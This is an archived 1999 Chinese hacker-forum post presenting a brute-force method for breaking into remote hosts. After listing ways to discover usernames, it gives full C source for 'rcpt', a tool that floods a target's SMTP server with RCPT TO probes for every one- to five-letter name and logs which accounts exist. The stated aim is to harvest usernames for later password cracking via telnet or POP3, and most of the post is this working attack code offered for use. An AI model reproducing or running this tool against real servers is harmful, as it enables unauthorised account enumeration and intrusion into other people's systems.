发信人: zer9()
整理人: williamlong(1999-09-28 22:15:37), 站内信件
|
cgi ,anonymous ftp,remote overflow...
当用尽了你所知道的技巧也不能进入站点时,
这时你只有两个选择:1。放弃 2。使用早以被你遗弃
的暴力法,强行突破。:)(I'd like this 0ne:)但为了
捍卫hacker的荣誉,当然是不能就此罢休的:)
如果让你从 telnet+/etc/passwd 或一个(或几个)用户名
+pop3hack你会选那一样?我选前者。试试就知道了.
确定远程主机上的用户名有如下几种方法:
1.通过如finger,ruser之类的服务。
(如 isp)
2.通过漏洞直接得到/etc/passwd,or the CORE include passwd
(如sunos)
3.通过报纸,杂志慢慢的收集 :)
(如。。。 电脑报 :)
4.通过sMTp(25).
...(还有什么遗漏的请告诉我哟:)
一般情况下前两种都是ADM 重点防范的对象,除非是
那些烂站,第三种你有耐心也可一试;
而第四种则是sMTp 本身固有的缺陷,
再加上sMtp的重要性,几乎绝大多数的站点都没有关闭之。
这也就成了我们利用的对象。在sMtp 的命令中,有价值
的有如下几种: VRFY,EXPN,RCPT。都可以利用。
但我测试的结果RCPt最快。具体程序如下。
zer9@21
cn.com
----Cut Here ---------------------------------------------------------
------
/* 通过"rcpt" 获得远程主机上的用户列表->/etc/passwd
* thr0ugh "rcpt" gain rem0te server's user list
* by
* zer9
*
* [email protected]
*
* test on:slackware 2.0.34&irix6.4
* cc rcpt.c -o rcpt
* 后台运行:nohup ./rcpt <Target>&
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <fcntl.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/socket.h>
#include <signal.h>
#include <ctype.h>
#include <arpa/inet.h>
#define SMTPPORT 25
#define VERSION "0.08"
#define LogFile "./rcpt.log"
#define TIMEOUT 200
#define SleepTime 1
int ver(void);
int look_up(int sock,char *string,char *buff);
int writeln(int sock,char *string)
{
char sendbuf[100];
bzero(sendbuf,100);
strncpy(sendbuf,string,strlen(string));
strncat(sendbuf,"\n",1);
send(sock,sendbuf,strlen(sendbuf),0);
return 0;
}
int s;
FILE *fp;
int main(int argc,char *argv[])
{
struct sockaddr_in sin;
struct in_addr Target;
struct hostent *he;
char j;
char recvbuf[1000],rcpt[200],a[8],hello_Target[500];
if(argc!=2)
{
printf("Rcpt %s by zer9[FTT] mailto: [email protected]\n",VERSION);
printf("Usage: %s <Target>\n",argv[0]);
return -1;
}
if((fp=fopen(LogFile,"a+"))==NULL)
{
perror("fopen");
return -1;
}
if((he=gethostbyname(argv[1]))!=NULL)
{
bcopy(he->h_addr,(char *)&Target.s_addr,he->h_length);
}
else
Target.s_addr=inet_addr(argv[1]);
if(Target.s_addr==-1)
{
perror("gethostbyname");
return -1;
}
ver();
fprintf(fp,"@Target: %s ",argv[1]);
if((s=socket(AF_INET,SOCK_STREAM,0))<0)
{
perror("sock");
return -1;
}
sin.sin_family=AF_INET;
sin.sin_port=htons(SMTPPORT);
sin.sin_addr.s_addr=Target.s_addr;
if(connect(s,(struct sockaddr*)&sin,sizeof(sin))<0)
{
perror("connect");
return -1;
}
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
bzero(a,sizeof(a));
fprintf(fp,"=========================================================
======\n");
if(recv(s,recvbuf,sizeof(recvbuf),0)<0) /* get Title */
{
perror("recv");
return -1;
}
fprintf(fp,"%s\n",recvbuf);
writeln(s,"help");
recv(s,recvbuf,sizeof(recvbuf),0);
fprintf(fp,"%s",recvbuf);
if(strstr(recvbuf,"RCPT")==NULL) /* check RCPT */
{
perror("no RCPT command. exit...");
return -1;
}
fprintf(fp,"------------------------------------\n");
bzero(recvbuf,sizeof(recvbuf));
writeln(s,"RSET");
recv(s,recvbuf,sizeof(recvbuf),0);
fprintf(fp,"%s",recvbuf);
strcpy(hello_Target,"HELO ");
strcat(hello_Target,"default");
writeln(s,hello_Target);
recv(s,recvbuf,sizeof(recvbuf),0);
fprintf(fp,"%s",recvbuf);
bzero(recvbuf,sizeof(recvbuf));
writeln(s,"mail from: [email protected]"); /*ma1l fr0m: [email protected]*/
recv(s,recvbuf,sizeof(recvbuf),0);
fprintf(fp,"%s",recvbuf);
fprintf(fp,"------------------------------------\n");
/* 1 bits */
for(a[0]='a';a[0]<='z';a[0]++)
{
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
strncpy(rcpt,"rcpt to: ",9);
sprintf(a,"%c",a[0]);
strncat(rcpt,a,strlen(a));
alarm(TIMEOUT);
writeln(s,rcpt);
sleep(SleepTime);
recv(s,recvbuf,sizeof(recvbuf),0);
alarm(0);
look_up(s,rcpt,recvbuf);
}
/* 2 bits*/
for(a[0]='a';a[0]<='z';a[0]++)
for(a[1]='a';a[1]<='z';a[1]++)
{
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
strncpy(rcpt,"rcpt to: ",9);
sprintf(a,"%c%c",a[0],a[1]);
strncat(rcpt,a,strlen(a));
alarm(TIMEOUT);
writeln(s,rcpt);
sleep(SleepTime);
recv(s,recvbuf,sizeof(recvbuf),0);
alarm(0);
look_up(s,rcpt,recvbuf);
}
/* 3 bits */
for(a[0]='a';a[0]<='z';a[0]++)
for(a[1]='a';a[1]<='z';a[1]++)
for(a[2]='a';a[2]<='z';a[2]++)
{
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
strncpy(rcpt,"rcpt to: ",9);
sprintf(a,"%c%c%c",a[0],a[1],a[2]);
strncat(rcpt,a,strlen(a));
alarm(TIMEOUT);
writeln(s,rcpt);
sleep(SleepTime);
recv(s,recvbuf,sizeof(recvbuf),0);
alarm(0);
look_up(s,rcpt,recvbuf);
}
/* 4 bits */
for(a[0]='a';a[0]<='z';a[0]++)
for(a[1]='a';a[1]<='z';a[1]++)
for(a[2]='a';a[2]<='z';a[2]++)
for(a[3]='a';a[3]<='z';a[3]++)
{
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
strncpy(rcpt,"rcpt to: ",9);
sprintf(a,"%c%c%c%c",a[0],a[1],a[2],a[3]);
strncat(rcpt,a,strlen(a));
alarm(TIMEOUT);
writeln(s,rcpt);
sleep(SleepTime);
recv(s,recvbuf,sizeof(recvbuf),0);
alarm(0);
look_up(s,rcpt,recvbuf);
}
/* 5 bits */
for(a[0]='a';a[0]<='z';a[0]++)
for(a[1]='a';a[1]<='z';a[1]++)
for(a[2]='a';a[2]<='z';a[2]++)
for(a[3]='a';a[3]<='z';a[3]++)
for(a[4]='a';a[4]<='z';a[4]++)
{
bzero(recvbuf,sizeof(recvbuf));
bzero(rcpt,sizeof(rcpt));
strncpy(rcpt,"rcpt to: ",9);
sprintf(a,"%c%c%c%c%c",a[0],a[1],a[2],a[3],a[4]);
strncat(rcpt,a,strlen(a));
alarm(TIMEOUT);
writeln(s,rcpt);
sleep(SleepTime);
recv(s,recvbuf,sizeof(recvbuf),0);
alarm(0);
look_up(s,rcpt,recvbuf);
}
/*in=fdopen(s,"r");
writeln(s,"rcpt to: hacker");
writeln(s,"rcpt to: root");
writeln(s,"rcpt to: sun");
writeln(s,"rcpt to: zero");
writeln(s,"rcpt to: zer0");
writeln(s,"rcpt to: uucp");
writeln(s,"rcpt to: 12345");
writeln(s,"rcpt to: ftp");
writeln(s,"rcpt to: guest");
writeln(s,"rcpt to: oracle");
writeln(s,"rcpt to: 345");
writeln(s,"rcpt to: uucp");
writeln(s,"QUIT");
while(fgets(recvbuf,sizeof(recvbuf),in)!=NULL)
{
if(strstr(recvbuf,"ok")!=NULL)
printf("%s",recvbuf);
fflush(in);
}
fclose(in); */
fprintf(fp,"=========================================================
====\n");
fprintf(fp,"okay!\n\n\n\n\n");
fclose(fp);
close(s);
return 0;
}
int look_up(int sock,char *string,char *buff)
{
if(strstr(buff,"ent ok")!=NULL) /* at sendmail 8.8.7: Recipien
t ok*/
fprintf(fp,"%s",buff);
fflush(fp);
return 0;
}
int ver(void)
{
fprintf(fp,"\n###############################\n");
fprintf(fp,"Rcpt %s by zer9[FTT] mailto: [email protected]\n",VERSION)
;
return 0;
}
--
※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 202.103.105.75]
|
|